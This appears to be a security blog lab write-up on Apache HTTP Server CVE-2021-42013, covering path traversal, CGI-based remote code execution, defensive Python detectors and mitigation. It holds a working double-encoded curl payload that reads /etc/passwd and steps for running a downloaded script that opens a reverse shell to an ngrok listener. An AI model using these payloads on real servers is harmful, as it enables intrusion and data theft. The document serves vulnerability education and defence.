Apache HTTPD Remote Code Execution (CVE-2021-42013)

June 28, 2024

Overview 

CVE-2021-42013 is a notable vulnerability discovered in Apache HTTP Server versions 2.4.49 and 2.4.50. It was observed that the solution for an earlier vulnerability, CVE-2021-41773, in Apache HTTP Server 2.4.50 was not adequate. This led to the emergence of CVE-2021-42013, which allows an attacker to exploit a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration “require all denied”, these requests can succeed. Moreover, if CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. 

The criticality of this vulnerability is highlighted by its CVSS score. The National Vulnerability Database (NVD) has assigned it a CVSS 3.x base score of 9.8, categorizing it as CRITICAL. 

CVE-2021-41773 vs CVE-2021-42013

CVE-2021-41773 and CVE-2021-42013 are both security issues found in Apache HTTP Server versions 2.4.49 and 2.4.50. The first one, CVE-2021-41773, is a problem where an attacker could trick the server into accessing files it shouldn’t be able to. This was due to a change in how the server handled file paths. If certain scripts were enabled, this could even allow the attacker to execute commands on the server. This problem was only present in version 2.4.49.

When the Apache team tried to fix this issue in version 2.4.50, they didn’t fully address the problem. This led to the second vulnerability, CVE-2021-42013. It’s similar to the first one, but it also affects version 2.4.50 because the initial fix was incomplete. So, both of these issues involve the same kind of attack, but the second one occurred because the solution to the first one wasn’t entirely effective. To successfully exploit the issue on 2.4.50, you cannot use %2e directly in the URL encoding. Instead, you should use the double-encoded version of %2e, which is %%32%65. 

Technical Breakdown

Before we dive into the technical details of CVE-2021-42013, it’s essential to understand the key components involved: the cgi-bin directory, the Require all granted and Alias directives, and the httpd.conf file of Apache HTTPD.

CGI-Bin: The cgi-bin directory is a standard directory on a server where CGI (Common Gateway Interface) scripts are stored. These scripts are used to generate dynamic web content, executing on the server to produce web pages tailored to the needs of users. CGI scripts can be written in various programming languages, including Perl, Python, and even compiled languages like C. While powerful, the capability to execute such scripts also presents significant security risks if not properly managed.

Require all granted: This is an authorization directive provided by Apache. It is used to control access to certain parts of the web server. The Require all granted directive allows access to the specified resource from any location. It’s equivalent to allowing all traffic to the specified resource. This is often used in a <Directory> block to specify the access control for a particular directory.


<Directory "/var/www/html">
    Require all granted
</Directory>

In the above example, all clients are allowed to access the resources in the /var/www/html directory.

Alias: The Alias directive allows documents to be stored in the local filesystem other than under the DocumentRoot. URLs with a (%-decoded) path beginning with url-path will be mapped to local files beginning with directory-path. The url-path is case-sensitive, even on case-insensitive file systems.


Alias "/image" "/ftp/pub/image"

In the above example, a request for http://www.example.com/image/foo.gif would cause the server to return the file /ftp/pub/image/foo.gif, if it exists. If it doesn’t exist, then the server will return a 404 error.

Httpd.conf file: The httpd.conf file is the primary configuration file used by Apache HTTPD. This file is central to the customization and security of the server environment, dictating how the server behaves in various scenarios. Configurations set in httpd.conf include server settings, directory settings, module loading, file access rules, etc. Proper configuration and management of the httpd.conf file are critical, as misconfigurations can lead to vulnerabilities, potentially opening the door to unauthorized data access or system control. When discussing CVE-2021-42013, the httpd.conf settings related to modules such as mod_cgi and mod_proxy are particularly relevant, as they interact to create the conditions under which this vulnerability can be exploited.

Now let’s dive into the details of this issue.

Path Traversal

The technical essence of the path traversal in CVE-2021-42013 lies in the way Apache HTTP Server decodes and normalizes URL paths. The server’s normalization function, which resolves URL-encoded values in the requested URI, processes the percent-encoded characters one at a time. This means that when the second dot of a “../” sequence is URL-encoded as “%2e”, the server fails to recognize it as a dot during the traversal check and does not decode it at that point. This effectively turns the “../” sequence into “.%2e/”, bypassing the check designed to prevent path traversal attacks.

In the httpd.conf file of the Apache server, the <Directory /> block has the directive Require all granted, which means that all users are granted access to all directories on the server. This configuration, combined with the path traversal vulnerability, allows an attacker to read arbitrary files from the server’s file system.

Remote Code Execution

Remote Code Execution (RCE) vulnerabilities allow an attacker to execute arbitrary code on a server. In the context of CVE-2021-42013, RCE can occur if CGI scripts are enabled for the paths affected by the path traversal vulnerability.

In the httpd.conf file, the ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/" directive maps the /cgi-bin/ URL path to the /usr/local/apache2/cgi-bin/ directory on the server. As this directory contains executable CGI scripts and is affected by the path traversal vulnerability, an attacker could potentially execute arbitrary code on the server.

Furthermore, the Directory "/usr/local/apache2/cgi-bin" block has the directive Require all granted, which means that all users are granted access to all files in the /usr/local/apache2/cgi-bin/ directory. This configuration, combined with the path traversal vulnerability and the presence of executable CGI scripts, could allow an attacker to execute arbitrary code on the server.

Additionally, in the httpd.conf file, the cgid_module is loaded when the mpm_prefork_module is not loaded. This module enables the server to execute CGI scripts, which could make it vulnerable to RCE attacks.

<IfModule !mpm_prefork_module>
        LoadModule cgid_module modules/mod_cgid.so
</IfModule>

Exploitation

We have set up a lab for this vulnerability; the application is running on http://10.122.0.8:8088/. To find its version, run an nmap scan against this IP and port. The scan result shows it is running Apache httpd 2.4.50.

This version is vulnerable to path traversal and remote code execution only with a non-default server configuration, so we have made some changes to the server’s configuration file. Details of these changes are below: 

The default configurations in Apache HTTPD server are as follows:

  • The cgi-bin is an alias directory.
  • The / directory is set for “require all denied”.
  • The /usr/local/apache2/htdocs directory is set to “require all granted”.
  • The /usr/local/apache2/cgi-bin directory is set to “require all granted”.
  • The CGI scripts are disabled.

To successfully exploit the Path Traversal vulnerability (CVE-2021-42013), the following conditions need to be met:

  • The default configuration of / as “require all denied” should be set to “require all granted”. This can be done by modifying the <Directory /> block as follows:

<Directory />
    AllowOverride none
    Require all granted
</Directory>

Now, let's exploit this path traversal issue. As discussed previously, to effectively exploit CVE-2021-42013 (Apache httpd 2.4.50), we cannot use %2e directly in the URL encoding. Instead, we must use the double-encoded version of %2e, which is %%32%65. The direct use of %2e targets servers running other vulnerable versions, such as httpd 2.4.49. Therefore, the correct payload to exploit this vulnerability on the current server version would be:


curl -s --path-as-is "http://IP:Port/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
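As an added defensive example (not code from the original post), the following Python detector runs over constructed access-log lines and shows why a check that percent-decodes only once misses the doubly encoded form used in the curl command above, while decoding to a fixed point flags both the %2e and the %%32%65 variants. The log lines, hosts and timestamps are constructed.

```python
"""Flag encoded '../' traversal in Apache access logs (CVE-2021-41773/42013 forms).

Added example, not from the original post. The log lines below are constructed
(RFC 5737 test addresses); the request paths mirror the two encodings discussed.
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
192.0.2.10 - - [28/Jun/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
192.0.2.11 - - [28/Jun/2024:10:00:02 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1024
192.0.2.12 - - [28/Jun/2024:10:00:03 +0000] "GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 200 1024
192.0.2.13 - - [28/Jun/2024:10:00:04 +0000] "GET /image/foo.gif HTTP/1.1" 404 233
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+"')

def has_dotdot_segment(path: str) -> bool:
    """True when any '/'-separated segment is exactly '..'."""
    return any(seg == ".." for seg in path.split("/"))

def decode_once(path: str) -> str:
    """One round of percent-decoding: '%2e' -> '.', but '%%32%65' only -> '%2e'."""
    return unquote(path)

def decode_fully(path: str, max_rounds: int = 4) -> str:
    """Decode until the string stops changing (bounded), so nested encodings unwrap."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def flag_requests(log: str) -> list:
    """Per request: (raw_path, flagged after one decode, flagged after full decode)."""
    results = []
    for line in log.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        raw = match.group("path")
        results.append((raw,
                        has_dotdot_segment(decode_once(raw)),
                        has_dotdot_segment(decode_fully(raw))))
    return results
```

The second and third rows are the two encodings this post discusses: only the fixed-point decode flags the %%32%65 request, which is why a single-pass check is an insufficient detection rule.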

To exploit remote code execution, the following conditions need to be met. Note that we have made further changes to the server for this, so the curl command above may no longer work as shown. 

  • A directory needs to be an alias directory. In this case, cgi-bin is an alias directory.
  • Enable the CGI script modules by uncommenting these lines in the configuration:

    LoadModule cgid_module modules/mod_cgid.so
    LoadModule cgi_module modules/mod_cgi.so

Download the exploit from here. Give it executable permission and, before running this script, set up your listening server. Here I have used the ngrok service, which creates a secure tunnel from the public internet to the local service running on TCP port 3000 on my machine. It provided me with a public TCP address and port 15157. Once everything is set up, fire the script with: 

    /1.sh target_ip target_port L_host L_port 

This gave me a reverse connection to my listener.   

Mitigation

To address these security issues, users should update their Apache HTTP Server to version 2.4.51 or a later version. It’s also important to scrutinize the server configuration and make sure that the <Directory /> block covering the entire server filesystem isn’t set to ‘Require all granted’. If your server operations don’t require CGI, consider turning it off as a precautionary measure against potential Remote Code Execution (RCE) attacks.
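As an added example (not the post’s or the lab’s own code), the following Python audit checks an httpd.conf excerpt for the conditions this post ties to exploitability (a <Directory /> block with Require all granted, an uncommented mod_cgi or mod_cgid LoadModule line, and a ScriptAlias) and reports them for a constructed vulnerable excerpt beside a hardened one that applies the mitigations above. Both config texts are constructed and modelled on the lab changes described in the Exploitation section.

```python
"""Audit an httpd.conf excerpt for the non-default settings this post describes.

Added example, not part of the original post. Both configs are constructed
excerpts modelled on the lab changes described above, not the lab's real file.
"""
import re

VULNERABLE_CONF = """\
LoadModule cgid_module modules/mod_cgid.so
LoadModule cgi_module modules/mod_cgi.so
<Directory />
    AllowOverride none
    Require all granted
</Directory>
ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"
"""

# Same layout with the mitigations applied: root denied, CGI modules commented out
HARDENED_CONF = """\
#LoadModule cgid_module modules/mod_cgid.so
#LoadModule cgi_module modules/mod_cgi.so
<Directory />
    AllowOverride none
    Require all denied
</Directory>
ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"
"""

DIR_BLOCK_RE = re.compile(r'<Directory\s+"?(?P<path>[^">\s]+)"?>(?P<body>.*?)</Directory>', re.S)
CGI_MODULE_RE = re.compile(r'^\s*LoadModule\s+cgid?_module\b', re.M)  # '#'-commented lines do not match
SCRIPT_ALIAS_RE = re.compile(r'^\s*ScriptAlias\b', re.M)
REQUIRE_GRANTED_RE = re.compile(r'^\s*Require\s+all\s+granted\b', re.M)

def audit(conf: str) -> dict:
    """Report which of the post's exploitability conditions the config satisfies."""
    root_granted = any(
        m.group("path") == "/" and bool(REQUIRE_GRANTED_RE.search(m.group("body")))
        for m in DIR_BLOCK_RE.finditer(conf)
    )
    cgi_enabled = bool(CGI_MODULE_RE.search(conf))
    script_alias = bool(SCRIPT_ALIAS_RE.search(conf))
    return {
        "root_granted": root_granted,   # lets the traversal reach files such as /etc/passwd
        "cgi_enabled": cgi_enabled,     # lets a traversed path be executed instead of read
        "script_alias": script_alias,   # the aliased, executable directory the request starts from
        "traversal_risk": root_granted,
        "rce_risk": root_granted and cgi_enabled and script_alias,
    }
```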

References

https://nvd.nist.gov/vuln/detail/CVE-2021-42013

https://medium.com/@ofriouzan/dissecting-and-exploiting-cve-2021-41773-and-cve-2021-42013-7c116f489ee2

https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013

https://github.com/twseptian/cve-2021-42013-docker-lab/tree/main